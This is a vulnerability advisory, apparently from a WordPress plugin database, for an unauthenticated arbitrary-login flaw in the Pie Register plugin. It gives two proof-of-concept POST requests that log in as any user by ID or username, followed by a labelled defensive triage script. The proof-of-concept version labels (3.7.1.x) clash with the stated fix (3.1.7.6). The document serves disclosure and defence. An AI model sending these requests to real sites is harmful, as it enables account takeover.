WordPress Plugin Vulnerabilities

Pie Register < 3.1.7.6 - Unauthenticated Arbitrary Login

Description

The plugin has a flaw in its social login implementation that allows an unauthenticated attacker to log in as any user on the site knowing only their user ID or username.

Proof of Concept

/pie-register-login/ is the plugin's login page, i.e. the page containing the [pie_register_login] shortcode.

v < 3.7.1.5
POST /pie-register-login/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Connection: close
Upgrade-Insecure-Requests: 1

log=a&pwd=a&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1


v < 3.7.1.6
POST /pie-register-login/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Upgrade-Insecure-Requests: 1

log=admin&pwd=a&social_site=true&wp-submit=Log+In

Affects Plugins

Fixed in 3.1.7.6
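
For defenders, a triage helper written for this page (an added example, not code from the advisory or from the plugin): it checks an installed version against the fixed release and flags logged login POSTs in which the client supplied the social-login parameters seen in the requests above. It assumes request bodies are available from a WAF or audit log, that the login page path matches the one shown above, and that a hit is a reason to review the request, not a verdict; the function names and sample records are constructed.

```python
from urllib.parse import parse_qs

FIXED_VERSION = "3.1.7.6"  # fixed release named in the advisory
SOCIAL_PARAMS = ("social_site", "user_id_social_site")  # names from the requests above


def is_vulnerable(installed, fixed=FIXED_VERSION):
    """True when the installed plugin version sorts below the fixed release."""
    a = [int(p) for p in installed.strip().split(".")]
    b = [int(p) for p in fixed.strip().split(".")]
    width = max(len(a), len(b))
    a += [0] * (width - len(a))  # pad so 3.1.7 compares as 3.1.7.0
    b += [0] * (width - len(b))
    return a < b


def flag_request(method, path, body, login_path="/pie-register-login/"):
    """Return the social-login parameters present in a login POST body, else []."""
    # login_path is site-specific: it is whichever page carries the login shortcode.
    same_page = path.split("?", 1)[0].rstrip("/") == login_path.rstrip("/")
    if method.upper() != "POST" or not same_page:
        return []
    fields = parse_qs(body, keep_blank_values=True)
    return [name for name in SOCIAL_PARAMS if name in fields]


# Constructed sample records (method, path, form body); not real traffic.
SAMPLE = [
    ("POST", "/pie-register-login/", "log=alice&pwd=correct-horse&wp-submit=Log+In"),
    ("POST", "/pie-register-login/",
     "log=a&pwd=a&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1"),
    ("POST", "/pie-register-login/", "log=admin&pwd=a&social_site=true&wp-submit=Log+In"),
    ("GET", "/pie-register-login/", ""),
]


def triage(records=SAMPLE):
    """Return (record index, flagged parameter names) for each suspicious record."""
    return [(i, hits) for i, (m, p, b) in enumerate(records)
            if (hits := flag_request(m, p, b))]


if __name__ == "__main__":
    print("installed 3.1.7.5 vulnerable:", is_vulnerable("3.1.7.5"))
    for index, hits in triage():
        print(f"record {index}: client-supplied {hits}")
```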

Miscellaneous

Original Researcher: AyeCode Ltd
Submitter: Stiofan
Verified: Yes

Timeline

Publicly Published: 2021-10-11
Added: 2021-10-11
Last Updated: 2022-04-08
